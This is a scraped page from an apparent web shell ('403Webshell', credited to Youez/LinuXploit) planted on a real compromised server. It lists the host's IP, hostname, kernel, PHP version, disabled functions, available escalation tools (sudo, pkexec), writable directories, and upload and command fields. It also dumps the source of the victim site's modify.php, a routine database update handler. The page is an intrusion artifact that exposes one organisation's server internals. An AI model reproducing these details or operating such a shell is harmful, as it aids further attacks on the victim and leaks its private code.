403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/onesupportsys.onesolution.hk/project/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/onesupportsys.onesolution.hk/project/modify.php
<?php

require_once(__DIR__ . '/../checkuser.php');
	session_start();
//-----------------------------------------------------------------------------
// Save if POST method
//-----------------------------------------------------------------------------
if (isPost()) {
	if (!$dbh->beginTransaction()) {
		throw new Exception('mysql begin transaction failure.');
	}
	try {
		$post = $_POST;

		$sql = "SELECT column_name FROM information_schema.columns WHERE table_schema = (SELECT DATABASE()) AND table_name = ?";
		$parameters = array('sup_project');
		if (!($sth = $dbh->prepare($sql))) {
			throw new Exception("sql prepare statement failure: $sql");
		}
		$sth->setFetchMode(PDO::FETCH_ASSOC);
		if (!$sth->execute($parameters)) {
			throw new Exception("sql execute statement failure: $sql");
		}
		$columns = $sth->fetchAll();

		foreach ($columns as $column) {
			$column = $column['column_name'];
			if (isset($post[$column])) {
				$project[$column] = $post[$column];
			}
		}

		// Append record time
		$now = date("Y-m-d H:i:s");
		$project = array_merge($project, array(
			'lastupdate' => $now,
			'lastupby' => $_SESSION['webadmin']['id'],
		));


		// Update project
		$values = array();
		$parameters = array();
		foreach ($project as $column => $value) {
			if ($column != 'id') {
				$parameters[] = !strlen($value) ? null : $value;
				$values[] = "`$column` = ?";
			}
		}

		$sql2 = "UPDATE sup_project SET " . implode(', ', $values) . " WHERE id = ?";

		if (!($sth = $dbh->prepare($sql2))) {
			throw new Exception("sql prepare statement failure: $sql2");
		}
		$sth->setFetchMode(PDO::FETCH_ASSOC);
		$parameters[] = $project['id'];
		if (!$sth->execute($parameters)) {
			throw new Exception("sql execute statement failure: $sql2");
		}

		$_SESSION["remark_project_id"] = $project['id'];


		if (!$dbh->commit()) {
			throw new Exception('mysql commit transaction failure.');
		}

	} catch (Exception $exception) {
		if (!$dbh->rollBack()) {
			throw new Exception('mysql roll back transaction failure.');
		}
		throw $exception;
	}

	$project_id = (int)$_POST["id"];

	redirectAndExit('index.php?message=Project Saved.');
}

Youez - 2016 - github.com/yon3zu
LinuXploit